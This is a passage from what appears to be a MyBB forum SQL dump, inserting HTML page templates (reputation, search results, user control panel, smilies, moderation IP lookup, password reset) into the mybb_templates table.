href=\"javascript:MyBB.whoPosted({$post[\'tid\']});\">{$post[\'thread_replies\']}</a></td>\n <td align=\"center\" class=\"{$bgcolor}\">{$post[\'thread_views\']}</td>\n <td class=\"{$bgcolor}\" style=\"white-space: nowrap; text-align: center;\"><span class=\"smalltext\">{$posted}</span></td>\n {$inline_mod_checkbox}\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('305', 'reputation_add', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->reputation}</title>\n{$headerinclude}\n</head>\n<body>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"trow1\" style=\"padding: 20px\">\n <strong>{$vote_title}</strong><br />{$post_rep_info}<br />\n <form action=\"reputation.php\" method=\"post\">\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <input type=\"hidden\" name=\"action\" value=\"do_add\" />\n <input type=\"hidden\" name=\"uid\" value=\"{$user[\'uid\']}\" />\n <input type=\"hidden\" name=\"pid\" value=\"{$mybb->input[\'pid\']}\" />\n <input type=\"hidden\" name=\"rid\" value=\"{$rid}\" />\n <select name=\"reputation\" id=\"reputation\">\n {$positive_power}\n {$neutral_power}\n {$negative_power}\n </select>\n <br /><br />\n <span class=\"smalltext\">{$lang->user_comments}</span>\n <br />\n <input type=\"text\" class=\"textbox\" name=\"comments\" size=\"35\" maxlength=\"250\" value=\"{$comments}\" style=\"width: 95%\" />\n <br /><br />\n <div style=\"text-align: center;\">\n <input type=\"submit\" class=\"button\" value=\"{$vote_button}\" />\n {$delete_button}\n </div>\n </form>\n </td>\n </tr>\n</table>\n</body>\n</html>', '-2', '1605', '', '1339729416'); INSERT INTO mybb_templates VALUES('306', 'postbit_reputation', '<br />{$lang->postbit_reputation} {$post[\'userreputation\']}', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('307', 'moderation_threadnotes_modaction', '<tr>\n<td class=\"{$trow}\" align=\"center\">{$modaction[\'profilelink\']}</td>\n<td class=\"{$trow}\" align=\"center\">{$modaction[\'dateline\']}</td>\n<td class=\"{$trow}\" align=\"center\">{$modaction[\'action\']}</td>\n<td class=\"{$trow}\">{$info}</td>\n</tr>\n', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('308', 'moderation_threadnotes_delayedmodaction', '<tr>\n<td class=\"{$trow}\" align=\"center\">{$delayedmod[\'profilelink\']}</td>\n<td class=\"{$trow}\" align=\"center\">{$delayedmod[\'dateline\']}</td>\n<td class=\"{$trow}\" align=\"center\">{$delayedmod[\'action\']}</td>\n<td class=\"{$trow}\">{$info}</td>\n</tr>\n', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('309', 'misc_smilies', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->smilies_listing}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"3\"><strong>{$lang->smilies_listing}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->name}</strong></span></td>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->abbreviation}</strong></span></td>\n</tr>\n{$smilies}\n</table>\n{$footer}\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('310', 'search_results_posts', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->search_results}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table width=\"100%\" align=\"center\" border=\"0\">\n <tr>\n <td align=\"right\" valign=\"top\">{$multipage}</td>\n </tr>\n</table>\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td colspan=\"9\" class=\"thead\">\n <strong>{$lang->search_results}</strong>\n </td>\n </tr>\n <tr>\n <td class=\"tcat\" align=\"center\" colspan=\"3\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=subject&amp;order=asc\">{$lang->post}</a> {$orderarrow[\'subject\']}</strong></span></td>\n <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=starter&amp;order=asc\">{$lang->author}</a> {$orderarrow[\'starter\']}</strong></span></td>\n <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=forum&amp;order=asc\">{$lang->forum}</a> {$orderarrow[\'forum\']}</strong></span></td>\n <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=replies&amp;order=desc\">{$lang->replies}</a> {$orderarrow[\'replies\']}</strong></span></td>\n <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=views&amp;order=desc\">{$lang->views}</a></strong> {$orderarrow[\'views\']}</span></td>\n <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=dateline&amp;order=desc\">{$lang->posted}</a> {$orderarrow[\'dateline\']}</strong></span></td>\n {$inlinemodcol}\n </tr>\n {$selectall}\n {$results}\n</table>\n<table width=\"100%\" align=\"center\" border=\"0\">\n <tr>\n <td align=\"left\" valign=\"top\">{$multipage}</td>\n <td align=\"right\" valign=\"top\">{$inlinemod}</td>\n </tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('311', 'private_limitwarning', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"trow1\" align=\"center\"><span class=\"smalltext\"><strong><span style=\"color:#FF0000;\">{$lang->reached_warning}</span></strong><br />{$lang->reached_warning2}</span></td>\n</tr>\n</table>\n<br />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('312', 'misc_smilies_smilie', '<tr>\n<td class=\"{$class}\" align=\"center\"><img src=\"{$smilie[\'image\']}\" /></td>\n<td class=\"{$class}\">{$smilie[\'name\']}</td>\n<td class=\"{$class}\">{$smilie[\'find\']}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('313', 'member_emailuser_guest', '<tr>\n<td width=\"40%\" class=\"trow2\"><strong>{$lang->your_name}</strong><br /><span class=\"smalltext\">{$lang->name_note}</span></td>\n<td width=\"60%\" class=\"trow2\"><input type=\"text\" class=\"textbox\" size=\"50\" name=\"fromname\" /></td>\n</tr>\n<tr>\n<td width=\"40%\" class=\"trow1\"><strong>{$lang->your_email}</strong><br /><span class=\"smalltext\">{$lang->email_note}</span></td>\n<td width=\"60%\" class=\"trow1\"><input type=\"text\" class=\"textbox\" size=\"50\" name=\"fromemail\" /></td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('314', 'usercp_subscriptions', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->subscriptions}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"usercp.php\" method=\"post\" name=\"input\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_subscriptions\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n{$multipage}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"7\"><strong>{$lang->subscriptions} ({$threadcount})</strong></td>\n </tr>\n <tr>\n <td class=\"tcat\" align=\"center\" colspan=\"2\">&nbsp;</td>\n <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->thread}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"7%\"><span class=\"smalltext\"><strong>{$lang->replies}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"7%\"><span class=\"smalltext\"><strong>{$lang->views}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"200\"><span class=\"smalltext\"><strong>{$lang->lastpost}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"1\"><input name=\"allbox\" title=\"Select All\" type=\"checkbox\" class=\"checkbox checkall\" value=\"1\" /></td>\n </tr>\n {$threads}\n {$remove_options}\n</table>\n<br />\n<div class=\"float_left\">\n <div class=\"float_left\">\n <dl class=\"thread_legend smalltext\">\n <dd><img src=\"{$theme[\'imgdir\']}/newfolder.gif\" alt=\"{$lang->new_posts_thread}\" title=\"{$lang->new_posts_thread}\" /> {$lang->new_posts_thread}</dd>\n <dd><img src=\"{$theme[\'imgdir\']}/newhotfolder.gif\" alt=\"{$lang->new_hot_thread}\" title=\"{$lang->new_hot_thread}\" /> {$lang->new_hot_thread}</dd>\n <dd><img src=\"{$theme[\'imgdir\']}/hotfolder.gif\" alt=\"{$lang->hot_thread}\" title=\"{$lang->hot_thread}\" /> {$lang->hot_thread}</dd>\n </dl>\n </div>\n\n <div class=\"float_left\">\n <dl class=\"thread_legend smalltext\">\n <dd><img src=\"{$theme[\'imgdir\']}/folder.gif\" alt=\"{$lang->no_new_thread}\" title=\"{$lang->no_new_thread}\" /> {$lang->no_new_thread}</dd>\n <dd><img src=\"{$theme[\'imgdir\']}/dot_folder.gif\" alt=\"{$lang->posts_by_you}\" title=\"{$lang->posts_by_you}\" /> {$lang->posts_by_you}</dd>\n <dd><img src=\"{$theme[\'imgdir\']}/lockfolder.gif\" alt=\"{$lang->locked_thread}\" title=\"{$lang->locked_thread}\" /> {$lang->locked_thread}</dd>\n </dl>\n </div>\n <br style=\"clear: both\" />\n</div>\n{$multipage}\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('315', 'online_today_row', '<tr>\n<td align=\"center\" class=\"trow1\" width=\"50%\">{$online[\'profilelink\']}{$invisiblemark}</td>\n<td align=\"center\" class=\"trow2\" width=\"50%\">{$onlinetime}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('316', 'member_profile_email', '<tr>\n<td class=\"trow2\"><strong>{$lang->email}</strong></td>\n<td class=\"trow2\"><a href=\"member.php?action=emailuser&amp;uid={$memprofile[\'uid\']}\">{$lang->send_user_email}</a></td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('317', 'loginbox', '<tr>\n<td class=\"trow2\"><strong>{$lang->username}</strong></td>\n<td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"username\" size=\"30\" value=\"{$username}\" /></td>\n</tr>\n<tr>\n<td class=\"trow1\"><strong>{$lang->password}</strong></td>\n<td class=\"trow1\"><input type=\"password\" class=\"textbox\" name=\"password\" size=\"30\" value=\"{$password}\" /></td>\n</tr>\n\n', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('318', 'misc_help_section_bit', '<tr>\n<td width=\"100%\" class=\"{$altbg}\"><strong><a href=\"misc.php?action=help&amp;hid={$helpdoc[\'hid\']}\">{$helpdoc[\'name\']}</a></strong><br /><span class=\"smalltext\">{$helpdoc[\'description\']}</span></td>\n</tr>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('319', 'index_birthdays_birthday', '{$comma}{$bdayuser[\'profilelink\']}{$age}', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('320', 'private_tracking_readmessage', '<tr>\n<td align=\"center\" class=\"trow1\" width=\"1%\"><img src=\"{$theme[\'imgdir\']}/old_pm.gif\" alt=\"\" /></td>\n<td class=\"trow2\">{$readmessage[\'subject\']}</td>\n<td class=\"trow1\" align=\"center\">{$readmessage[\'profilelink\']}</td>\n<td class=\"trow2\" align=\"right\"><span class=\"smalltext\">{$readdate}<br />{$readtime}</span></td>\n<td class=\"trow1\"><input type=\"checkbox\" class=\"checkbox\" name=\"readcheck[{$readmessage[\'pmid\']}]\" value=\"1\" /></td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('321', 'private_tracking_unreadmessage', '<tr>\n<td align=\"center\" class=\"trow1\" width=\"1%\"><img src=\"{$theme[\'imgdir\']}/new_pm.gif\" alt=\"\" /></td>\n<td class=\"trow2\">{$unreadmessage[\'subject\']}</td>\n<td class=\"trow1\" align=\"center\">{$unreadmessage[\'profilelink\']}</td>\n<td class=\"trow2\" align=\"right\"><span class=\"smalltext\">{$senddate}<br />{$sendtime}</span></td>\n<td class=\"trow1\"><input type=\"checkbox\" class=\"checkbox\" name=\"unreadcheck[{$unreadmessage[\'pmid\']}]\" value=\"1\" /></td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('322', 'private_tracking_nomessage', '<tr>\n<td align=\"center\" class=\"trow1\" colspan=\"5\">{$lang->no_readmessages}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('323', 'usercp_editlists_user', '<li style=\"width: 33%; float: left; list-style: none; margin-bottom: 4px;\" id=\"{$type}_{$user[\'uid\']}\">\n <a href=\"usercp.php?action=do_editlists&amp;my_post_key={$mybb->post_code}&amp;manage={$type}&amp;delete={$user[\'uid\']}\" onclick=\"return UserCP.removeBuddy(\'{$type}\', {$user[\'uid\']});\" title=\"{$lang->remove_from_list}\"><img src=\"{$theme[\'imgdir\']}/buddy_delete.gif\" title=\"[{$lang->delete}]\" alt=\"{$lang->remove_from_list}\" style=\"vertical-align: middle;\" /></a>\n <img src=\"{$theme[\'imgdir\']}/buddy_{$status}.gif\" title=\"{$lang->$status}\" alt=\"\" style=\"vertical-align: middle;\" />\n {$profile_link}\n</li>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('324', 'showthread_threadedbox', '<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><span class=\"smalltext\"><strong>{$lang->messages_in_thread}</strong></span></td>\n</tr>\n<tr>\n<td class=\"trow1\">{$threadedbits}</td>\n</tr>\n</table>\n', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('325', 'showthread_multipage', '<tr>\n<td class=\"tcat\" colspan=\"2\"> {$multipage}</td>\n</tr>', '-2', '126', '', '1339729416'); INSERT INTO mybb_templates VALUES('326', 'forumbit_moderators', '<br />{$lang->forumbit_moderated_by} {$moderators}', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('327', 'moderation_deletepoll', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->delete_poll}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->delete_poll}</strong></td>\n</tr>\n{$loginbox}\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_poll}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_deletepoll\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n<input type=\"hidden\" name=\"delete\" value=\"1\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('328', 'member_profile_signature', '<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->users_signature}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">{$memprofile[\'signature\']}</td>\n</tr>\n</table>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('329', 'newreply_modoptions', '<tr>\n<td class=\"trow2\" valign=\"top\"><strong>{$lang->mod_options}</strong></td>\n<td class=\"trow2\"><span class=\"smalltext\">\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"modoptions[closethread]\" value=\"1\"{$closecheck} />&nbsp;{$lang->close_thread}</label><br />\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"modoptions[stickthread]\" value=\"1\"{$stickycheck} />&nbsp;{$lang->stick_thread}</label>\n</span></td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('330', 'smilieinsert_getmore', '<tr>\n<td class=\"trow2\" align=\"center\"><span class=\"smalltext\"><strong>[<a href=\"javascript:clickableEditor.openGetMoreSmilies(\'clickableEditor\');\">{$lang->smilieinsert_getmore}</a>]</strong></span></td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('331', 'misc_smilies_popup', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->smilies_listing}</title>\n{$headerinclude}\n<script type=\"text/javascript\">\n<!--\n var editor = eval(\'opener.\' + \'{$editor}\');\n function insertSmilie(code)\n {\n if(editor)\n {\n editor.performInsert(code, \"\", true, false);\n }\n }\n// -->\n</script>\n\n</head>\n<body>\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"4\"><strong>{$lang->smilies_listing}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"4\"><span class=\"smalltext\">{$lang->click_to_add}</span></td>\n</tr>\n{$smilies}\n<tr>\n<td class=\"thead\" colspan=\"4\" align=\"center\"><span class=\"smalltext\">[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]</span></td>\n</tr>\n</table>\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('332', 'misc_smilies_popup_smilie', '<td class=\"{$class}\" align=\"center\"><img src=\"{$smilie[\'image\']}\" alt=\"{$smilie[\'find\']}\" title=\"{$smilie[\'find\']}\" onclick=\"insertSmilie(\'{$smilie[\'insert\']}\');\" /></a></td>\n<td class=\"{$class}\">{$smilie[\'find\']}</td>', '-2', '123', '', '1339729416'); INSERT INTO mybb_templates VALUES('333', 'showteam', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->forum_team}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$grouplist}\n{$footer}\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('334', 'index_birthdays', '<tr><td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->todays_birthdays}</strong></span></td></tr>\n<tr>\n<td class=\"trow1\"><span class=\"smalltext\">{$bdays}</span></td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('335', 'moderation_getip', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->get_post_ip}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->get_post_ip}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"20%\"><strong>{$lang->username}</strong></td>\n<td class=\"trow1\">{$username}</td>\n</tr>\n<tr>\n<td class=\"trow2\"><strong>{$lang->ip_address}</strong></td>\n<td class=\"trow2\">{$post[\'ipaddress\']}</td>\n</tr>\n<tr>\n<td class=\"trow1\"><strong>{$lang->hostname}<br /><span class=\"smalltext\">{$lang->if_resolvable}</span></strong></td>\n<td class=\"trow2\">{$hostname}</td>\n</tr>\n{$modoptions}\n</table>\n{$footer}\n</body>\n</html>', '-2', '1608', '', '1339729416'); INSERT INTO mybb_templates VALUES('336', 'moderation_getip_modoptions', '<tr>\n<td class=\"trow2\"><strong>{$lang->mod_options}</strong></td>\n<td class=\"trow2\">\n <a href=\"modcp.php?action=ipsearch&amp;ipaddress={$post[\'ipaddress\']}&amp;search_users=1\">{$lang->search_ip_users}</a><br />\n <a href=\"modcp.php?action=ipsearch&amp;ipaddress={$post[\'ipaddress\']}&amp;search_posts=1\">{$lang->search_ip_posts}</a><br />\n <a href=\"modcp.php?action=iplookup&ipaddress={$post[\'ipaddress\']}\" onclick=\"MyBB.popupWindow(\'{$mybb->settings[\'bburl\']}/modcp.php?action=iplookup&ipaddress={$post[\'ipaddress\']}\', \'iplookup\', 500, 250); return false;\">{$lang->info_on_ip}</a>\n</td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('337', 'postbit_iplogged_hiden', '<p class=\"smalltext\">{$lang->postbit_ipaddress} <a href=\"moderation.php?action=getip&amp;pid={$post[\'pid\']}\">{$lang->postbit_ipaddress_logged}</a></p>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('338', 'usercp_options_tppselect', '<tr>\n<td colspan=\"2\"><span class=\"smalltext\">{$lang->tpp}</span></td>\n</tr>\n<tr>\n<td colspan=\"2\">\n<select name=\"tpp\">\n<option value=\"\">{$lang->use_default}</option>\n{$tppoptions}\n</select>\n</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('339', 'index_logoutlink', '<a href=\"member.php?action=logout&amp;logoutkey={$mybb->user[\'logoutkey\']}\">{$lang->index_logout}</a> | ', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('340', 'postbit_iplogged_show', '<p class=\"smalltext\">{$lang->postbit_ipaddress} {$post[\'ipaddress\']}</p>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('341', 'usercp_changeavatar', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->change_avatar}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form enctype=\"multipart/form-data\" action=\"usercp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"3\"><strong>{$lang->change_avatar}</strong></td>\n</tr>\n<tr>\n<td align=\"center\" class=\"trow1\" width=\"1%\"><input type=\"radio\" class=\"radio\" name=\"avatar\" value=\"url\"{$checked[\'url\']} /></td>\n<td class=\"trow1\" width=\"40%\"><strong>{$lang->avatar_url}</strong><br /><span class=\"smalltext\">{$lang->avatar_url_note}</span></td>\n<td class=\"trow1\" width=\"55%\"><input type=\"text\" class=\"textbox\" name=\"avatarurl\" size=\"25\" maxlength=\"100\" value=\"{$avatarurl}\" /></td>\n</tr>\n<tr>\n<td align=\"center\" class=\"trow2\" width=\"1%\"><input type=\"radio\" class=\"radio\" name=\"avatar\" value=\"upload\"{$checked[\'upload\']} /></td>\n<td class=\"trow2\" width=\"40%\"><strong>{$lang->avatar_upload}</strong><br /><span class=\"smalltext\">{$lang->avatar_upload_note}</span></td>\n<td class=\"trow2\" width=\"55%\"><input type=\"file\" name=\"avatarupload\" size=\"25\" value=\"\" class=\"fileupload\" />{$uploadedmsg}</td>\n</tr>\n<tr>\n<td align=\"center\" class=\"trow1\" width=\"1%\"><input type=\"radio\" class=\"radio\" name=\"avatar\" value=\"list\"{$checked[\'list\']} /></td>\n<td class=\"trow1\" width=\"40%\"><strong>{$lang->avatar_list}</strong><br /><span class=\"smalltext\">{$lang->avatar_list_note}</span></td>\n<td class=\"trow1\" width=\"55%\">\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\n<tr>\n<td valign=\"middle\">\n<select name=\"avatarlist\" size=\"5\" onChange=\"document.images.avatarpic.src=\'{$mybb->settings[\'avatardir\']}/\'+this[this.selectedIndex].value;\">\n{$listoptions}\n</select>\n</td>\n<td valign=\"middle\">\n<img src=\"{$avatarpic}\" name=\"avatarpic\" width=\"80\" height=\"80\" />\n</td>\n</tr>\n</table>\n</td>\n</tr>\n<tr>\n<td align=\"center\" class=\"trow2\" width=\"1%\"><input type=\"radio\" class=\"radio\" name=\"avatar\" value=\"none\"{$checked[\'none\']} /></td>\n<td colspan=\"2\" class=\"trow2\" width=\"95%\"><strong>{$lang->no_avatar}</strong><br /><span class=\"smalltext\">{$lang->no_avatar_note}</span></td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_avatar\" />\n<input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->change_avatar}\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('342', 'usercp_notepad', '<br />\n<form action=\"usercp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->personal_notepad}</strong></td>\n</tr>\n<tr>\n<td align=\"center\" class=\"trow1\" width=\"100%\">\n<textarea name=\"notepad\" cols=\"1\" rows=\"10\" class=\"usercp_notepad\">{$mybb->user[\'notepad\']}</textarea>\n</td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_notepad\" />\n<input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_notepad}\" />\n</div>\n</form>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('343', 'private_messagebit_sep', '<tr>\n<td class=\"tcat\" align=\"center\" colspan=\"6\" height=\"1\"><img src=\"{$theme[\'imgdir\']}/pixel.gif\" height=\"1\" width=\"1\" alt=\"\"/></td>\n</tr>\n ', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('344', 'polls_editpoll_option', '<tr>\n<td>{$lang->option} {$counter}:&nbsp;</td>\n<td><input type=\"text\" class=\"textbox\" name=\"options[{$counter}]\" value=\"{$option}\" /></td>\n<td>{$lang->votes}&nbsp;</td>\n<td><input type=\"text\" class=\"textbox\" name=\"votes[{$counter}]\" value=\"{$optionvotes}\" /></td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('345', 'member_resetpassword', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->reset_password}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<br />\n<form action=\"member.php\" method=\"post\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->reset_password}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"30%\"><strong>{$lang_username}</strong></td>\n<td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"username\" value=\"{$user[\'username\']}\" /></td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"30%\"><strong>{$lang->activation_code}</strong></td>\n<td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"code\" value=\"{$code}\" /></td>\n</tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"hidden\" name=\"action\" value=\"resetpassword\" /><input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->send_password}\" /></div>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1607', '', '1339729416'); INSERT INTO mybb_templates VALUES('346', 'forumdisplay_thread_multipage', ' <span class=\"smalltext\">({$lang->pages} {$threadpages}{$morelink})</span>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('347', 'forumdisplay_thread_multipage_page', '<a href=\"{$page_link}\">{$i}</a> ', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('348', 'forumdisplay_thread_multipage_more', '... <a href=\"{$page_link}\">{$thread[\'pages\']}</a>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('349', 'member_profile_customfields', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td colspan=\"2\" class=\"thead\"><strong>{$lang->users_additional_info}</strong></td>\n</tr>\n{$customfields}\n</table>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('350', 'member_profile_customfields_field', '<tr>\n<td class=\"{$bgcolor}\" width=\"40%\"><strong>{$customfield[\'name\']}:</strong></td>\n<td class=\"{$bgcolor}\" width=\"60%\">{$customfieldval}</td>\n</tr>\n', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('351', 'forumdisplay_usersbrowsing_user', '{$comma}{$user[\'profilelink\']}{$invisiblemark}', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('352', 'forumdisplay_usersbrowsing', '<span class=\"smalltext\">{$lang->users_browsing_forum} {$onlinemembers}{$onlinesep}{$invisonline}{$onlinesep2}{$guestsonline}</span><br />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('353', 'member_lostpw', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - 